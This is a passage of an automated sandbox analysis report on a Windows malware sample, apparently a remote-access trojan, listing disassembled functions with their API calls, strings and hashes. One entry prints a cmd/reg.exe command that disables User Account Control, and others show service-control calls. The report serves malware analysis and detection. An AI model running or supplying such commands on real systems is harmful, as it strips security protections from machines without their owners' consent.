                                • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe
                                • String ID:
                                • API String ID: 4189289331-0
                                • Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                • Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                • String ID:
                                • API String ID: 493672254-0
                                • Opcode ID: 6d957316612e9e1639687d6e998d7ab77ff57d14ab12c87d2f09a2430009e9f1
                                • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                • Opcode Fuzzy Hash: 6d957316612e9e1639687d6e998d7ab77ff57d14ab12c87d2f09a2430009e9f1
                                • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                • _free.LIBCMT ref: 0044824C
                                • _free.LIBCMT ref: 00448274
                                • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                • _abort.LIBCMT ref: 00448293
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 311859fee7c9cfc71de310ff83382dc2b6c95d747b6933e344276464a171e98f
                                • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                • Opcode Fuzzy Hash: 311859fee7c9cfc71de310ff83382dc2b6c95d747b6933e344276464a171e98f
                                • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 1b37a1e7eac98f1240c34f126e6a4f870ba627e83eac9c5dd9270139d563d70d
                                • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                • Opcode Fuzzy Hash: 1b37a1e7eac98f1240c34f126e6a4f870ba627e83eac9c5dd9270139d563d70d
                                • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: f9e3a9574bebdc31c431017d68fe9d332939c115f8ba389fbd910f6d712af4f5
                                • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                • Opcode Fuzzy Hash: f9e3a9574bebdc31c431017d68fe9d332939c115f8ba389fbd910f6d712af4f5
                                • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00443AB2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: H%j
                                • API String ID: 0-3294387659
                                • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                • GetLastError.KERNEL32 ref: 0041D580
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ClassCreateErrorLastRegisterWindow
                                • String ID: 0$MsgWindowClass
                                • API String ID: 2877667751-2410386613
                                • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                • CloseHandle.KERNEL32(?), ref: 004077AA
                                • CloseHandle.KERNEL32(?), ref: 004077AF
                                Strings
                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreateProcess
                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                • API String ID: 2922976086-4183131282
                                • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                • String ID: KeepAlive | Disabled
                                • API String ID: 2993684571-305739064
                                • Opcode ID: 17bfdc88350a56738500cb661d506395563dca3eea58109498aa24bd4a02de42
                                • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                • Opcode Fuzzy Hash: 17bfdc88350a56738500cb661d506395563dca3eea58109498aa24bd4a02de42
                                • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                • Sleep.KERNEL32(00002710), ref: 0041AE07
                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                • String ID: Alarm triggered
                                • API String ID: 614609389-2816303416
                                • Opcode ID: 8320d0a8477b2dfdf5ffede3a6159dd71cddf314a322f93aa69cf56e5021b822
                                • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                • Opcode Fuzzy Hash: 8320d0a8477b2dfdf5ffede3a6159dd71cddf314a322f93aa69cf56e5021b822
                                • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                Strings
                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                • API String ID: 3024135584-2418719853
                                • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • _free.LIBCMT ref: 00444E06
                                • _free.LIBCMT ref: 00444E1D
                                • _free.LIBCMT ref: 00444E3C
                                • _free.LIBCMT ref: 00444E57
                                • _free.LIBCMT ref: 00444E6E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
